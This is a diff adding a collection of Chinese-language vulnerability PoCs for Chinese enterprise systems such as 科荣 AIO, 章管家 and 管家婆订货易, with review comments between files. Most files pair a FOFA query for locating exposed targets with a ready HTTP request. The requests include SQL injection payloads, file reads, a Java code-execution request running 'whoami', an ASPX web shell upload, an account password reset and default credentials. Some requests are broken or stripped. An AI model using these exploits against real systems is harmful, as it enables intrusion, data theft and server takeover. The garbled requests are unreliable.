@@ -0,0 +1,26 @@ +# 科汛新职教网校系统CheckOrder存在SQL注入漏洞 + +科汛新职教网校系统KesionEDU CheckOrder 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +body="/KS_Inc/static/edu" +``` + +## poc +```javascript +POST /webapi/APP/CheckOrder HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: application/json, text/javascript, */*; q=0.01 +Priority: u=0 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest + +{"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"} +``` + +![image-20241227223044294](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272230369.png) \ No newline at end of file diff --git a/科荣-AIO任意文件上传-目录遍历-任意文件读取漏洞.md b/科荣-AIO任意文件上传-目录遍历-任意文件读取漏洞.md new file mode 100644 index 0000000..72b4b32 --- /dev/null +++ b/科荣-AIO任意文件上传-目录遍历-任意文件读取漏洞.md @@ -0,0 +1,26 @@ +## 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞 + +## fofa +``` +body="changeAccount('8000')" +``` +## 目录遍历 +``` +http://xxxxxx/ReportServlet?operation=getFileList&path=../../../ +``` + +## 文件上传 +``` +POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1 +Host: xxxxxx +Connection: lose +Content-Type: application/x-www-form-urlencoded +Content-Length: 2 + +demo +``` + +## 任意文件读取 +``` +http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini +``` diff --git a/科荣AIO管理系统ReportServlet存在任意文件读取漏洞.md b/科荣AIO管理系统ReportServlet存在任意文件读取漏洞.md new file mode 100644 index 0000000..40ab16c --- /dev/null +++ b/科荣AIO管理系统ReportServlet存在任意文件读取漏洞.md 
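Review bot: the CheckOrder request declares `Content-Type: application/x-www-form-urlencoded; charset=UTF-8` but sends a JSON body, and `User-Agent` appears twice; fix the header and say whether the endpoint parses JSON from the raw body. The payload uses SQL Server syntax (`CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)` concatenation) and on success echoes the marker `qkpzq1qqkkq`; name the DBMS and the expected string as the 360 pages do. In the 科荣 AIO combined page of this hunk, the upload request has `Connection: lose` (close) and `Content-Length: 2` for the 4-byte body `demo`.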
@@ -0,0 +1,25 @@ +# 科荣 AIO 管理系统 ReportServlet 存在任意文件读取漏洞 + +# 一、漏洞简介 +科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统存在任意文件读取漏洞,攻击者可以读取敏感文件。 + +# 二、影响版本 ++ 科荣 AIO 管理系统 + +# 三、资产测绘 ++ hunter`app.name="科荣 AIO"` ++ 特征 + +![1699631783798-97153184-155c-4762-9c58-b7c8334bc638.png](./img/XvBttgxBfIbQVhAw/1699631783798-97153184-155c-4762-9c58-b7c8334bc638-362329.png) + +# 四、漏洞复现 +```plain +/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini +``` + +![1703605110708-aaf15e4f-0d1d-42ac-b61e-58ee7433ad4e.png](./img/XvBttgxBfIbQVhAw/1703605110708-aaf15e4f-0d1d-42ac-b61e-58ee7433ad4e-041534.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/科荣AIO管理系统ReportServlet存在目录遍历漏洞.md b/科荣AIO管理系统ReportServlet存在目录遍历漏洞.md new file mode 100644 index 0000000..be6a73c --- /dev/null +++ b/科荣AIO管理系统ReportServlet存在目录遍历漏洞.md @@ -0,0 +1,25 @@ +# 科荣 AIO 管理系统 ReportServlet 存在目录遍历漏洞 + +# 一、漏洞简介 +科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统 ReportServlet 存在目录遍历漏洞。 + +# 二、影响版本 ++ 科荣 AIO 管理系统 + +# 三、资产测绘 ++ hunter`app.name="科荣 AIO"` ++ 特征 + +![1699631783798-97153184-155c-4762-9c58-b7c8334bc638.png](./img/d0I-odb_X4vG0cJx/1699631783798-97153184-155c-4762-9c58-b7c8334bc638-658775.png) + +# 四、漏洞复现 +```plain +/ReportServlet?operation=getFileList&path=../../../ +``` + +![1703605287356-07bc4a86-49d8-48fd-b476-7346b62ee0de.png](./img/d0I-odb_X4vG0cJx/1703605287356-07bc4a86-49d8-48fd-b476-7346b62ee0de-355215.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/科荣AIO管理系统UtilServlet存在任意文件读取漏洞.md b/科荣AIO管理系统UtilServlet存在任意文件读取漏洞.md new file mode 100644 index 0000000..182f924 --- /dev/null +++ b/科荣AIO管理系统UtilServlet存在任意文件读取漏洞.md 
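Review bot: both ReportServlet pages repeat URLs already in 科荣-AIO任意文件上传-目录遍历-任意文件读取漏洞.md; cross-reference rather than keep three copies. `fileName=/DISKC/Windows/Win.ini` is not a native Windows path, so explain how the `DISKC` prefix maps to a drive (and whether other drives or Linux paths work), and for `getFileList&path=../../../` say which directory the listing is relative to.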
@@ -0,0 +1,38 @@ +# 科荣 AIO 管理系统 UtilServlet 存在任意文件读取漏洞 + +# 一、漏洞简介 +科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统存在任意文件读取漏洞,攻击者可以读取敏感文件。 + +# 二、影响版本 ++ 科荣 AIO 管理系统 + +# 三、资产测绘 ++ hunter`app.name="科荣 AIO"` ++ 特征 + +![1699631783798-97153184-155c-4762-9c58-b7c8334bc638.png](./img/KJn1NI1bH8toct3T/1699631783798-97153184-155c-4762-9c58-b7c8334bc638-007622.png) + +# 四、漏洞复现 +```plain +POST /UtilServlet HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 +Content-Length: 52 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: no-cache +Connection: close +Content-Type: application/x-www-form-urlencoded +Pragma: no-cache +Upgrade-Insecure-Requests: 1 + +operation=readErrorExcel&fileName=C:\windows/win.ini +``` + +![1699631836577-be6e6474-29de-4eba-aca2-4b8170c58b0a.png](./img/KJn1NI1bH8toct3T/1699631836577-be6e6474-29de-4eba-aca2-4b8170c58b0a-883570.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/科荣AIO管理系统UtilServlet存在远程命令执行漏洞.md b/科荣AIO管理系统UtilServlet存在远程命令执行漏洞.md new file mode 100644 index 0000000..0177da1 --- /dev/null +++ b/科荣AIO管理系统UtilServlet存在远程命令执行漏洞.md 
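Review bot: `operation=readErrorExcel&fileName=C:\windows/win.ini` demonstrates only an absolute Windows path; state whether the parameter also accepts relative traversal or a Linux path, or mark the finding Windows-only. The backslash and colon should be URL-encoded in a form body, and the three 科荣 pages would read better with the shared introduction and fingerprint stated once.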
@@ -0,0 +1,30 @@ +# 科荣 AIO 管理系统 UtilServlet 存在远程命令执行漏洞 + +# 一、漏洞简介 +科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统 UtilServlet 存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 科荣 AIO 管理系统 + +# 三、资产测绘 ++ hunter`app.name="科荣 AIO"` ++ 特征 + +![1699631783798-97153184-155c-4762-9c58-b7c8334bc638.png](./img/8C_gc1ZbNQq7MyLJ/1699631783798-97153184-155c-4762-9c58-b7c8334bc638-959475.png) + +# 四、漏洞复现 +```plain +POST /UtilServlet HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field +``` + +![1706534515581-13127fb9-02eb-477c-99f7-de2a3cca7804.png](./img/8C_gc1ZbNQq7MyLJ/1706534515581-13127fb9-02eb-477c-99f7-de2a3cca7804-488011.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/科荣AIO管理系统endTime参数存在SQL注入漏洞.md b/科荣AIO管理系统endTime参数存在SQL注入漏洞.md new file mode 100644 index 0000000..f6854e2 --- /dev/null +++ b/科荣AIO管理系统endTime参数存在SQL注入漏洞.md 
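Review bot: `operation=calculate&value=BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("cmd.exe /c whoami")...` is Java source evaluated server-side, so this is arbitrary code execution through an expression evaluator rather than a shell injection; the summary should say that and give a Linux variant (`/bin/sh -c id`) since `cmd.exe` limits the PoC to Windows. `fieldName=example_field` is never explained; state whether it must name an existing field.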
@@ -0,0 +1,22 @@ +# 科荣AIO管理系统endTime参数存在SQL注入漏洞 + +科荣AIO endTime接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +``` +body="changeAccount('8000')" +``` + +## poc + +``` +GET /moffice?op=showWorkPlanList&type=1&beginTime=1&endTime=1*&sid=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +``` + diff --git a/科荣AIO系统接口UtilServlet存在代码执行漏洞.md b/科荣AIO系统接口UtilServlet存在代码执行漏洞.md new file mode 100644 index 0000000..b4f6323 --- /dev/null +++ b/科荣AIO系统接口UtilServlet存在代码执行漏洞.md @@ -0,0 +1,25 @@ +# 科荣AIO系统接口UtilServlet存在代码执行漏洞 + +科荣AIO UtilServlet 存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。 + +## fofa + +```javascript +body="changeAccount('8000')" +``` + +## poc + +```javascript +POST /UtilServlet HTTP/1.1 +Host:127.0.0.1 +User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length:322 + +operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field +``` + +![920396433c98be57376c249f469ae450](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111012822.png) \ No newline at end of file diff --git a/秒优科技-供应链管理系统doAction存在SQL注入漏洞.md b/秒优科技-供应链管理系统doAction存在SQL注入漏洞.md new file mode 100644 index 0000000..d37bbd8 --- /dev/null +++ b/秒优科技-供应链管理系统doAction存在SQL注入漏洞.md 
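Review bot: in the endTime file, `endTime=1*` relies on the sqlmap `*` injection-marker convention without saying so; a reader who sends it literally has nothing to match on. State that the asterisk marks the parameter under test and which response (timing or error text) indicates injection, and add a version line.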
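Review bot: the second file, `科荣AIO系统接口UtilServlet存在代码执行漏洞.md`, duplicates `科荣AIO管理系统UtilServlet存在远程命令执行漏洞.md` from this same patch (same `UtilServlet`, same `operation=calculate` body); merge them. Both the FOFA query and the raw HTTP request are fenced with the `javascript` tag, which mis-highlights them; use a plain or `http` fence. `Host:127.0.0.1` and `User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit...` are missing their spaces, which suggests the request was retyped rather than captured.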
@@ -0,0 +1,25 @@ +# 秒优科技-供应链管理系统doAction存在SQL注入漏洞 + +由于秒优科技-供应链管理系统 doAction 接口未对用户传入的参数进行合理的校验和过滤,导致传入的参数直接携带到数据库执行,导致SQL注入漏洞,未经身份验证的攻击者可通过此漏洞获取数据库权限,深入利用可获取服务器权限。 + +## fofa +```javascript +app="秒优科技-供应链管理系统" +``` + +## poc +```javascript +POST /zh/login/doAction HTTP/1.1 +Host: +X-Requested-With: XMLHttpRequest +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/json +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Priority: u=0 + +{"usercode":"1'+(SELECT CHAR(83)+CHAR(87)+CHAR(119)+CHAR(105) WHERE 6635=6635 AND 2366 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2366=2366) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(113))))+'","password":"1","remember":false,"ip":null,"city":null,"ISERP":"ISERP"} +``` + +![image-20241219151645423](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191516482.png) \ No newline at end of file diff --git a/竞优(广州)信息技术有限公司商业租赁管理系统存在Trace信息泄露.md b/竞优(广州)信息技术有限公司商业租赁管理系统存在Trace信息泄露.md new file mode 100644 index 0000000..d82c93b --- /dev/null +++ b/竞优(广州)信息技术有限公司商业租赁管理系统存在Trace信息泄露.md @@ -0,0 +1,25 @@ +# 竞优(广州)信息技术有限公司商业租赁管理系统存在Trace信息泄露 + +# 一、漏洞简介 +作为地产及不动产数字化行业深耕者,三十多年来始终专注于企业管理软件的技术开发和咨询服务。我们多年对地产及不动产行业的专注投入、以及深刻理解能为企业提供专业的产品、高效的实施服务、强大的技术支持和优质的售后保障。竞优(广州)信息技术有限公司商业租赁管理系统存在Trace信息泄露 + +# 二、影响版本 ++ 商业租赁管理系统 + +# 三、资产测绘 ++ fofa:`web.body="商业租赁管理系统"` ++ 特征 + +![1734059111504-935ba16c-2b17-4fde-bfb1-1e1aaeca4365.png](./img/aqlzwYG_j1SYsfpl/1734059111504-935ba16c-2b17-4fde-bfb1-1e1aaeca4365-447474.png) + +# 四、漏洞复现 +```java +/RMS/Trace.axd +``` + +![1734059130097-8678b441-56e8-4fde-86b4-c14ec8c293ea.png](./img/aqlzwYG_j1SYsfpl/1734059130097-8678b441-56e8-4fde-86b4-c14ec8c293ea-490959.png) + + + +> 更新: 2024-12-20 14:53:54 +> 原文: \ No newline at end of file 
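Review bot: in the 秒优 doAction file, `Host:` is empty and the only success indicator is a screenshot. The 简介 claims the flaw yields 数据库权限, but the JSON `usercode` value is an error-based probe; spell out the marker string its `CHAR(113)+CHAR(98)+...` prefix and suffix produce so a reader can confirm the response. Both fences are tagged `javascript` for non-JavaScript content, and no version is given.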
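Review bot: in the 竞优 Trace file, the asset-mapping line is labelled `fofa:` but uses Hunter's field syntax `web.body="..."` (FOFA queries use `body=`), so the query will not run on the platform it names. The `漏洞简介` is the vendor's first-person marketing copy (`我们多年对地产...`) and ends by repeating the title; it should say that `/RMS/Trace.axd` is the ASP.NET trace viewer left enabled on a production site and what it discloses. The path is fenced with the `java` tag.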
diff --git a/竞优(广州)信息技术有限公司商业租赁管理系统存在account信息泄露.md b/竞优(广州)信息技术有限公司商业租赁管理系统存在account信息泄露.md new file mode 100644 index 0000000..72dd4d7 --- /dev/null +++ b/竞优(广州)信息技术有限公司商业租赁管理系统存在account信息泄露.md @@ -0,0 +1,36 @@ +# 竞优(广州)信息技术有限公司商业租赁管理系统存在account信息泄露 + +# 一、漏洞简介 +作为地产及不动产数字化行业深耕者,三十多年来始终专注于企业管理软件的技术开发和咨询服务。我们多年对地产及不动产行业的专注投入、以及深刻理解能为企业提供专业的产品、高效的实施服务、强大的技术支持和优质的售后保障。竞优(广州)信息技术有限公司商业租赁管理系统存在account信息泄露。 + +# 二、影响版本 ++ 商业租赁管理系统 + +# 三、资产测绘 ++ fofa:`web.body="商业租赁管理系统"` ++ 特征 + +![1734059111504-935ba16c-2b17-4fde-bfb1-1e1aaeca4365.png](./img/g3wDnKSTiXIbeg2X/1734059111504-935ba16c-2b17-4fde-bfb1-1e1aaeca4365-805138.png) + +# 四、漏洞复现 +```java +POST /rental/contract/api/account.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetAccountInfo" + + + + + + + +``` + +![1734107735397-9fddf4a4-d582-4080-852b-0c22e3914398.png](./img/g3wDnKSTiXIbeg2X/1734107735397-9fddf4a4-d582-4080-852b-0c22e3914398-503109.png) + + + +> 更新: 2024-12-20 14:53:54 +> 原文: \ No newline at end of file diff --git a/章管家Druid未授权访问漏洞.md b/章管家Druid未授权访问漏洞.md new file mode 100644 index 0000000..19b61f8 --- /dev/null +++ b/章管家Druid未授权访问漏洞.md @@ -0,0 +1,25 @@ +# 章管家 Druid未授权访问漏洞 + +# 一、漏洞简介 +章管家是国内专业智能印章管理平台,专注为传统印章管理提供整套解决方案。章管家 Druid存在未授权,导致信息泄露漏洞。 + +# 二、影响版本 ++ 章管家 + +# 三、资产测绘 ++ fofa`app="章管家-印章智慧管理平台"` ++ 特征 + +![1710317023603-d16c8499-7bb7-43f9-a4d0-34ea66bea032.png](./img/yyr6IA3aoCGUX0A7/1710317023603-d16c8499-7bb7-43f9-a4d0-34ea66bea032-658621.png) + +# 四、漏洞复现 +```java +/druid/index.html +``` + +![1710317051910-3d9b5692-56dd-4a1b-92e3-ebd6e617d9d9.png](./img/yyr6IA3aoCGUX0A7/1710317051910-3d9b5692-56dd-4a1b-92e3-ebd6e617d9d9-120289.png) + + + +> 更新: 2024-03-13 23:54:14 +> 原文: \ No newline at end of file diff --git a/章管家list.htm存在SQL注入漏洞.md b/章管家list.htm存在SQL注入漏洞.md new file mode 100644 index 0000000..496d49e --- /dev/null +++ b/章管家list.htm存在SQL注入漏洞.md 
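Review bot: in the account.asmx file, the request body is blank: the SOAP envelope that should follow `SOAPAction: "http://tempuri.org/GetAccountInfo"` has been stripped (only empty lines remain, and `Content-Length: length` is the literal placeholder from an .asmx description page), so the POC cannot be reproduced from this file; restore the envelope inside the fence, where markdown will not eat the XML. The `fofa:` label again carries Hunter's `web.body=` syntax, and `> 原文:` is empty.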
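Review bot: in the 章管家 Druid file, `/druid/index.html` is fenced with the `java` tag, and the 简介 says only `存在未授权,导致信息泄露` without naming what the Druid monitor page exposes (executed SQL, sessions, request URIs), which is what a defender needs to judge impact; add a sentence and a version line. The `fofa` query here correctly uses `app=`.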
@@ -0,0 +1,27 @@ +# 章管家list.htm存在SQL注入漏洞 + +章管家 department/list.htm 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +body="章管家登录-公章在外防私盖" +``` + +## poc + +```javascript +POST /app/department/list.htm HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Content-Type: application/x-www-form-urlencoded + +token=dingtalk_token&person_id=1&unit_id=1&id=' or SL EEP(6) or ' +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132236104.png) \ No newline at end of file diff --git a/章管家updatePwd.htm存在任意账号密码重置漏洞.md b/章管家updatePwd.htm存在任意账号密码重置漏洞.md new file mode 100644 index 0000000..ea266c4 --- /dev/null +++ b/章管家updatePwd.htm存在任意账号密码重置漏洞.md @@ -0,0 +1,23 @@ +# 章管家updatePwd.htm存在任意账号密码重置漏洞 + +章管家是上海建业信息科技股份有限公司推出的一款针对传统印章风险管理提供的整套解决方案的工具。 + +```yaml +app="章管家-印章智慧管理平台" +``` + +## poc + +```java +POST /app/updatePwd.htm HTTP/1.1 +Host: +User-Agent: python-requests/2.31.0 +Accept-Encoding: gzip, deflate, br +Accept: */* +Connection: close +Content-Length: 87 +Content-Type: application/x-www-form-urlencoded + +mobile=18888888888&newPassword=12312dsa12&equipmentName=xxxxxx&version=4.0.0&token=dingtalk_token +``` + diff --git a/管家婆订货易在线商城UploadImgNoCheck存在文件上传漏洞.md b/管家婆订货易在线商城UploadImgNoCheck存在文件上传漏洞.md new file mode 100644 index 0000000..f8ee267 --- /dev/null +++ b/管家婆订货易在线商城UploadImgNoCheck存在文件上传漏洞.md 
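Review bot: in the list.htm file, the body sends `token=dingtalk_token`, a fixed literal that evidently satisfies the endpoint's authentication, yet the document never mentions this precondition; it is the single most useful detection indicator and should be documented. The payload `' or SL EEP(6) or '` has a space inside a function name, which looks like copy/paste corruption; verify it against the source. The FOFA query and the HTTP request are both fenced with the `javascript` tag.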
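Review bot: in the updatePwd file, the same fixed `token=dingtalk_token` appears without explanation, and `mobile=18888888888` is a concrete phone number where a placeholder belongs. `Content-Length: 87` does not match the body as shown, which is 97 bytes from `mobile=` through `dingtalk_token`, so either the body or the header was edited after capture. The query lacks the `## fofa` heading the sibling files use, and nothing states which response indicates the reset succeeded.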
@@ -0,0 +1,45 @@ +# 管家婆订货易在线商城UploadImgNoCheck存在文件上传漏洞 + +管家婆订货易在线商城是一个专为传统企业打造的B2B订货平台,帮助传统企业构建专属的订货平台,集合了PC商城、微信商城、小程序商城、APP商城以及H5触屏版商城,形成五网合一的全方位覆盖。` /api/Upload/UploadImgNoCheck `接口处存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```javascript +title="订货易" || title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3" +``` + +## poc + +```javascript +POST /api/Upload/UploadImgNoCheck?m_server_name=ShopUserImg HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR + +------WebKitFormBoundaryj7OlOPiiukkdktZR +Content-Disposition: form-data; name="Filedata";filename="rce.aspx" +Content-Type: image/jpeg + +GIF89a +<%@ Page Language="Jscript" validateRequest="false" %> +<% +var c=new System.Diagnostics.ProcessStartInfo("cmd"); +var e=new System.Diagnostics.Process(); +var out:System.IO.StreamReader,EI:System.IO.StreamReader; +c.UseShellExecute=false; +c.RedirectStandardOutput=true; +c.RedirectStandardError=true; +e.StartInfo=c; +c.Arguments="/c " + Request.Item["cmd"]; +e.Start(); +out=e.StandardOutput; +EI=e.StandardError; +e.Close(); +Response.Write(out.ReadToEnd() + EI.ReadToEnd()); +System.IO.File.Delete(Request.PhysicalPath); +Response.End();%> +------WebKitFormBoundaryj7OlOPiiukkdktZR-- +``` + +![image-20241128095645719](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280956783.png) \ No newline at end of file diff --git a/索贝融媒体search存在SQL注入漏洞.md b/索贝融媒体search存在SQL注入漏洞.md new file mode 100644 index 0000000..8141410 --- /dev/null +++ b/索贝融媒体search存在SQL注入漏洞.md 
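Review bot: the multipart body embeds a complete command-execution ASPX page as the uploaded file. For a verification document a benign marker file (a text or image body with a unique string, the way the 红帆 nuclei template in this patch uploads `qaxnb.txt`) proves the missing extension check without leaving a shell on the target; replace the part body and describe the expected response and stored path instead. The part also declares `Content-Type: image/jpeg` while beginning with a `GIF89a` header, and the FOFA query is fenced with the `javascript` tag.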
@@ -0,0 +1,26 @@ +# 索贝融媒体search存在SQL注入漏洞 + +索贝融媒体产品是成都索贝数码科技股份有限公司(简称索贝)为各级电视台和媒体机构打造的一套集互联网和电视融合生产的解决方案。索贝融媒体 Sc-TaskMonitoring/rest/task/search 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +icon_hash="689611853" +``` + +## poc + +```javascript +POST /Sc-TaskMonitoring/rest/task/search HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/json +Cookie: token=5ab95532238da1b7d9eb20de7ecef90e; siteCode=S1 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive + +{"page":1,"search":{"assignedCodes":""},"size":10,"date":{},"sort":{"field":"1 AND EXTRACTVALUE(8342,CONCAT(0x7e,0x7171787171,(SELECT (ELT(8342=8342,1))),0x716b706b71,0x7e))","desc":true}} +``` + +![image-20241122150816351](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221508580.png) \ No newline at end of file diff --git a/索贝融媒体存在硬编码漏洞.md b/索贝融媒体存在硬编码漏洞.md new file mode 100644 index 0000000..e893e2e --- /dev/null +++ b/索贝融媒体存在硬编码漏洞.md @@ -0,0 +1,18 @@ +# 索贝融媒体存在硬编码漏洞 + +索贝融媒体存在硬编码漏洞,导致默认密码泄露造成的后台管理系统的非法利用。 + +## fofa + +```javascript +body="/Sc-TaskMonitoring/" || header="Sobey" +``` + +## poc + +```javascript +sobey/sobey +sobey/Sobeyhive-2016 +``` + +![image-20241106230744176](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062307238.png) \ No newline at end of file diff --git a/紫光档案管理系统WorkFlow存在任意文件上传漏洞.md b/紫光档案管理系统WorkFlow存在任意文件上传漏洞.md new file mode 100644 index 0000000..566e7a3 --- /dev/null +++ b/紫光档案管理系统WorkFlow存在任意文件上传漏洞.md 
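Review bot: in the search file, the request carries `Cookie: token=5ab95532238da1b7d9eb20de7ecef90e; siteCode=S1` while the 简介 says the attacker is 未经身份验证; either the token is required, in which case say where it comes from and the flaw is post-auth, or it is not and it should be dropped. Also state the expected error marker (`qqxqq` and `qkpkq`, the decoded `0x7171787171` and `0x716b706b71` constants in the `EXTRACTVALUE` payload) instead of relying on the screenshot. The fences are tagged `javascript`.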
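Review bot: in the 硬编码 file, `sobey/sobey` and `sobey/Sobeyhive-2016` are listed with no statement of which login (web console path or service) they belong to or in which component they are hard-coded, so the claim `导致默认密码泄露` cannot be checked; add the location and a version line. The credential pairs are fenced with the `javascript` tag.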
